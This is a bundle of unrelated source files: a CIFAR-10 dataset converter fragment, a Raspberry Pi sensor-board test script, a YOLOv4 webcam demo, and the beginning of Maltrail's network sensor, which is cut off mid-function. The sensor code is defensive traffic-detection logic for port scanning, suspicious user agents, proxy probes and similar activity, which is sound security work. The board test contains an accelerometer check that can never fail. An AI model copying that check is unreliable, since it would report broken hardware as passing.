cifar10_data.load_data()
images = cifar10_data.images
logger.info("train images: {}".format(images.shape))
labels = cifar10_data.labels
logger.info("train images label: {}".format(labels.shape))
test_images = cifar10_data.Test.images
logger.info("test images: {}".format(test_images.shape))
test_labels = cifar10_data.Test.labels
logger.info("test images label: {}".format(test_labels.shape))
data_list = _construct_raw_data(images, labels)
test_data_list = _construct_raw_data(test_images, test_labels)
if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
return FAILED
if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
return FAILED
return SUCCESS
def transform(self, fields=None):
"""
Encapsulate the run function to exit normally
Args:
fields (list[str], optional): A list of index fields. Default: None.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
t = ExceptionThread(target=self.run, kwargs={'fields': fields})
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
def _construct_raw_data(images, labels):
"""
Construct raw data from cifar10 data.
Args:
images (list): image list from cifar10.
labels (list): label list from cifar10.
Returns:
list[dict], data dictionary constructed from cifar10.
"""
if not cv2:
raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
raw_data = []
for i, img in enumerate(images):
label = np.int(labels[i][0])
_, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
row_data = {"id": int(i),
"data": img.tobytes(),
"label": int(label)}
raw_data.append(row_data)
return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
"""
Generate MindRecord file from raw data.
Args:
file_name (str): File name of MindRecord File.
fields (list[str]): Fields would be set as index which
could not belong to blob fields and type could not be 'array' or 'bytes'.
raw_data (dict): dict of raw data.
schema_desc (str): String of schema description.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
schema = {"id": {"type": "int64"}, "label": {"type": "int64"},
"data": {"type": "bytes"}}
logger.info("transformed MindRecord schema is: {}".format(schema))
writer = FileWriter(file_name, 1)
writer.add_schema(schema, schema_desc)
if fields and isinstance(fields, list):
writer.add_index(fields)
writer.write_raw_data(raw_data)
return writer.commit()
|
fulltest.py | from quickpi import *
import time
import RPi.GPIO as GPIO
import threading
import random
import os
def checkTest(value, name):
if value:
print("Test " + name + " passed")
displayTextOled("Test " + name + " passed")
else:
print("Test " + name + " failed")
displayTextOled("Test " + name + " failed")
return [value, name]
def getAverageLightLevel(waittime):
start = time.time()
total = 0
n = 0
while time.time() - start < waittime:
current = readADCADS1015(2, 1, True)
#print(current)
total = total + current
n = n + 1
return total/n
def getAverageSoundLevel(waittime):
start = time.time()
total = 0
n = 0
while time.time() - start < waittime:
total = total + readSoundLevel(1)
n = n + 1
return total/n
def getIrReceiver(waittime, expected):
start = time.time()
while time.time() - start < waittime:
if buttonStateInPort(23) != expected:
return False
return True
expected_i2c = [0x1d, 0x1e, 0x29,0x3c, 0x48, 0x68]
def listi2cDevices():
#Set the screen pin high so that the screen can be detected
RESET=21
GPIO.setmode(GPIO.BCM)
GPIO.setup(RESET, GPIO.OUT)
time.sleep(0.01)
GPIO.output(RESET, 1)
i2c_present = []
for device in range(128):
h = pi.i2c_open(1, device)
try:
pi.i2c_read_byte(h)
i2c_present.append(device)
except:
pass
pi.i2c_close(h)
return i2c_present
def testI2cDevices():
global expected_i2c
return listi2cDevices() == expected_i2c
def testDistanceVL53l0x(up):
print("Testing distance sensor VL53l0x")
start = time.time()
if up:
displayTextOled("Unobstruct distance sensor")
while True:
distance = readDistanceVL53(0)
if distance == 819.0:
return True
else:
while time.time() - start < 0.5:
distance = readDistanceVL53(0)
if distance > 13:
print("Distance > 130", distance)
return False
return True
def testAccelerometerBMI160():
print("Testing accelerometer BMI160")
start = time.time()
while time.time() - start < 0.5:
accel = readAccelBMI160()
force = accel[0] + accel[1] + accel[2]
if force < 0.8 and force > 1.2:
return False
return True
def testAccelerometerLSM303C():
print("Testing accelerometer LSM303C")
start = time.time()
while time.time() - start < 0.5:
accel = reaAccelerometerLSM303C()
force = accel[0] + accel[1] + accel[2]
#print(force)
if force < 0.8 and force > 1.2:
return False
return True
def testLeds():
print("Blinking Leds")
for i in (27, 4, 17):
print("Blinking led in " + str(i))
start = time.time()
while time.time() - start < 0.6:
changeLedState(i, 1)
time.sleep(0.1)
lighton = getAverageLightLevel(0.1)
#print("On", lighton)
changeLedState(i, 0)
time.sleep(0.1)
lightoff = getAverageLightLevel(0.1)
#print("Off", lightoff)
#print("Diff", lighton - lightoff)
if (lighton - lightoff) <= 4:
print("Failed Diff", lighton - lightoff)
return False
return True
def testBuzzer():
print("Blinking Buzzer")
start = time.time()
while time.time() - start < 1:
changePassiveBuzzerState(12, 1)
soundon = getAverageSoundLevel(0.05)
changePassiveBuzzerState(12, 0)
soundoff = getAverageSoundLevel(0.05)
if (soundon - soundoff) < 1:
print("Failed: diff", soundon - soundoff)
return False
return True
def testButtons():
print("Press all buttons")
buttons_expected = [7, 8, 9, 10, 11, 26]
buttons_already_pressed = []
cleared = False
while True:
how_many_pressed = 0
for button in buttons_expected:
#print("Testing", button)
if (buttonStateInPort(button)):
button_pressed = button
how_many_pressed = how_many_pressed + 1
if how_many_pressed == 1:
if button_pressed not in buttons_already_pressed:
buttons_already_pressed.append(button_pressed)
buttons_already_pressed.sort()
print(buttons_already_pressed)
if not cleared:
fill(0)
noStroke()
drawRectangle(0, 0, 127, 31)
fill(1)
cleared = True
if button_pressed == 7: #center
drawCircle(17, 15, 6)
elif button_pressed == 8: # right
drawCircle(28, 15, 6)
elif button_pressed == 9: # Down
drawCircle(17, 25, 6)
elif button_pressed == 10: # up
drawCircle(17, 6, 6)
elif button_pressed == 11: # Left
drawCircle(6, 15, 6)
elif button_pressed == 26: #Button2
drawCircle(50, 15, 6)
if buttons_already_pressed == buttons_expected:
return True
time.sleep(0.1)
def testIRTransAndReceiver():
print("Testing infrared emiter and receiver")
start = time.time()
while time.time() - start < 1:
setInfraredState(22, 1)
time.sleep(0.2)
result = getIrReceiver(0.1, 0)
if not result:
return False
setInfraredState(22, 0)
time.sleep(0.2)
result = getIrReceiver(0.1, 1)
if not result:
return False
return True
def waitForBoard():
global expected_i2c
while True:
i2c_devices = listi2cDevices()
if len(i2c_devices) > 0:
if expected_i2c == i2c_devices:
return
else:
print("board is missing devices", list(set(expected_i2c) - set(i2c_devices)))
if 60 in i2c_devices:
displayTextOled("Missing device:", str(list(set(expected_i2c) - set(i2c_devices))))
time.sleep(0.5)
def waitForBoardRemoved(string):
global expected_i2c
fill = False
while True:
displayTextOled(string, "", fill)
fill = not fill
i2c_devices = listi2cDevices()
if len(i2c_devices) == 0:
return
time.sleep(0.5)
def waitForBoardUp():
uptimes = 0
buzzerstate = False
while True:
buzzerstate = not buzzerstate
changePassiveBuzzerState(12, buzzerstate)
accel = readAccelBMI160()
if accel == [0, 0, 0]:
return False
if (accel[0] <= 0.2 and accel[0] >= -0.2 and
accel[1] <= 0.2 and accel[1] >= -0.2 and
accel[2] <= 1.2 and accel[2] >= 0.8):
uptimes = uptimes + 1
else:
uptimes = 0
if uptimes > 4:
changePassiveBuzzerState(12, False)
return True
time.sleep(0.2)
def waitForBoardDown():
uptimes = 0
buzzerstate = False
while True:
buzzerstate = not buzzerstate
changePassiveBuzzerState(12, buzzerstate)
accel = readAccelBMI160()
#print(accel)
if accel == [0, 0, 0]:
return False
if (accel[0] <= 0.2 and accel[0] >= -0.2 and
accel[1] <= 0.2 and accel[1] >= -0.2 and
accel[2] >= -1.2 and accel[2] <= -0.8):
uptimes = uptimes + 1
else:
uptimes = 0
if uptimes > 4:
changePassiveBuzzerState(12, False)
return True
time.sleep(0.2)
angles = [0, 0, 0]
calibration = [0, 0, 0]
stop_gyro = False
def testGyro():
global angles
print("Gyro", angles)
xangle = abs(angles[0])
yangle = abs(angles[1])
if (xangle > 60 and xangle < 120) or (yangle > 60 and yangle < 120):
return True
return False
import statistics
def gyro_calibration_thread():
global calibration
calibrationsamples = 1000
samples = 0
while samples < calibrationsamples:
values = readGyroBMI160()
calibration[0] += values[0]
calibration[1] += values[1]
calibration[2] += values[2]
samples += 1
calibration[0] /= samples
calibration[1] /= samples
calibration[2] /= samples
def gyro_thread():
global angles
global calibration
global stop_gyro
lasttime = readGyroBMI160()[3]
start = time.time()
while True:
if stop_gyro:
break
values = readGyroBMI160()
dt = (values[3] - lasttime) * 3.9e-5
lasttime = values[3]
# print("DT = ", dt * 3.9e-5)
angles[0] += (values[0] - calibration[0]) * dt
angles[1] += (values[1] - calibration[1]) * dt
angles[2] += (values[2] - calibration[2]) * dt
# print(values)
# if time.time() - start >= 0.5:
# print(int(angles[0]), int(angles[1]), int(angles[2]))
# start = time.time()
try:
print("Waiting for board...")
waitForBoard()
displayTextOled("Board detected")
time.sleep(2)
displayTextOled("Press all buttons")
checkTest(testButtons(), "buttons")
threading.Thread(target=gyro_calibration_thread).start()
result = checkTest(testIRTransAndReceiver(), "irtransrecv")
if result[0]:
result = checkTest(testAccelerometerLSM303C(), "accel-lsm303c")
if result[0]:
result = checkTest(testAccelerometerBMI160(), "accel-bmi160")
if result[0]:
result = checkTest(testI2cDevices(), "i2c-devices")
if result[0]:
displayTextOled("Put board face down")
print("Waiting for board to be face down...")
result = checkTest(waitForBoardDown(), "facedown")
if result[0]:
threading.Thread(target=gyro_thread).start()
displayTextOled("", "")
result = checkTest(testLeds(), "leds")
if result[0]:
result = checkTest(testDistanceVL53l0x(False), "distance")
if result[0]:
displayTextOled("Put board face up")
print("Waiting for board to be face up...")
result = checkTest(waitForBoardUp(), "boardup")
if result[0]:
result = checkTest(testDistanceVL53l0x(True), "distance")
if result[0]:
result = checkTest(testGyro(), "gyro")
stop_gyro = True
# if result[0]:
# result = checkTest(testBuzzer(), "buzzer-mic")
boardstatus = ""
a = random.randrange(0, 255)
b = a * 229
b = b & 0xFF
a = "%0.2X" % a
b = "%0.2X" % b
if result[0]:
print("BOARD PASSED ALL TEST")
displayTextOled("PASS " + b + a)
boardstatus = "BOARD OK"
os.system("echo " + str(result[1]) + " > /mnt/data/" + a + b)
else:
print("BOARD failed ", result[1])
displayTextOled("FAIL", result[1])
boardstatus = "FAIL"
os.system("echo " + str(result[1]) + " > /mnt/data/" + a + b + "failed")
waitForBoardRemoved(boardstatus + " " + a + b)
except Exception as e:
displayTextOled("FAIL")
print(e)
changePassiveBuzzerState(12, False)
sleep(3)
|
camera.py | # -*- coding: utf-8 -*-
'''
@Time : 2020/04/26 15:48
@Author : Tianxiaomo
@File : camera.py
@Noice :
@Modificattion :
@Author :
@Time :
@Detail :
'''
from __future__ import division
import cv2
from models import *
#from tool.darknet2pytorch import Darknet
import argparse
from tool.utils import *
import time
from cfg import Cfg
import threading
def play_sound():
os.system('mpg321 test1.mp3')
def arg_parse():
"""
Parse arguements to the detect module
"""
parser = argparse.ArgumentParser(description='YOLO v4 Cam Demo')
parser.add_argument("--confidence", dest="confidence", help="Object Confidence to filter predictions", default=0.25)
parser.add_argument("--nms_thresh", dest="nms_thresh", help="NMS Threshhold", default=0.4)
parser.add_argument("--reso", dest='reso', help=
"Input resolution of the network. Increase to increase accuracy. Decrease to increase speed",
default="160", type=str)
parser.add_argument("--num_classes", dest="num_classes", help="Number of classes", default=2)
parser.add_argument("-w","--weightsfile", dest="weightsfile", help="Weights File", default="checkpoints/Yolov4_epoch300.pth")
return parser.parse_args()
if __name__ == '__main__':
cfgfile = "cfg/yolov4.cfg"
#weightsfile = "checkpoints/Yolov4_epoch600.pth"
#weightsfile = "checkpoints/Yolov4_epoch150.pth"
args = arg_parse()
confidence = float(args.confidence)
nms_thesh = float(args.nms_thresh)
#CUDA = torch.cuda.is_available() #原本的
num_classes = int(args.num_classes)
bbox_attrs = 5 + num_classes
class_names = load_class_names("data/_classes.txt")
model = Yolov4(n_classes=num_classes)
pretrained_dict = torch.load(args.weightsfile, map_location=torch.device('cuda'))
model.load_state_dict(pretrained_dict)
#model = Darknet(cfgfile) #原本的
#model.load_weights(weightsfile) #原本的
if torch.cuda.is_available():
model.cuda()
model.eval()
cap = cv2.VideoCapture(0)
assert cap.isOpened(), 'Cannot capture source'
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
#out = cv2.VideoWriter('outpy.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 10, (frame_width, frame_height))
frames = 0
start = time.time()
count = 0
while cap.isOpened():
ret, frame = cap.read()
if ret:
#sized = cv2.resize(frame, (model.width, model.height)) #原本的
sized = cv2.resize(frame, (Cfg.height, Cfg.width))
#sized = cv2.cvtColor(sized, cv2.COLOR_BGR2RGB) #用攝影機捕捉的影像原本就是RGB了,大概
boxes = do_detect(model, sized, 0.5, num_classes, 0.4)
#boxes = do_detect(model, sized, 0.5, 0.4, CUDA) #原本的
orig_im, warn = plot_boxes_cv2(frame, boxes, class_names=class_names)
#cv2.putText(orig_im, boxes[], (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
#out.write(orig_im)
cv2.imshow("frame", orig_im)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
frames += 1
count += 1
print("FPS of the video is {:5.2f}".format(frames / (time.time() - start)))
if warn & (count >= 100):
t = threading.Thread(target = play_sound)
t.start()
count = 0
else:
break
|
sensor.py | #!/usr/bin/env python
"""
Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
from core.addr import inet_ntoa6
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_RESULT_CACHE_ENTRIES)
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if IS_WIN:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy')" % ('3' if six.PY3 else '2')
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
result = _result_cache.get((CACHE_TYPE.DOMAIN_WHITELISTED, query))
if result is None:
result = _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
_result_cache[(CACHE_TYPE.DOMAIN_WHITELISTED, query)] = result
return result
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get((CACHE_TYPE.DOMAIN, query)) == False:
return
result = False
if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
parts = query.split('.')
if trails._regex:
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
trail = trail.replace(".)", ").")
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
if len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
if not check_whitelisted(_src_ip):
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or "%s:%s" % (dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = dst_ip if dst_ip in trails else "%s:%s" % (dst_ip, dst_port)
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or "%s:%s" % (src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = src_ip if src_ip in trails else "%s:%s" % (src_ip, src_port)
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = os.path.splitext(checks[-1])
if _[1]:
checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\bX-Forwarded-For:\s*([0-9.]+)", packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
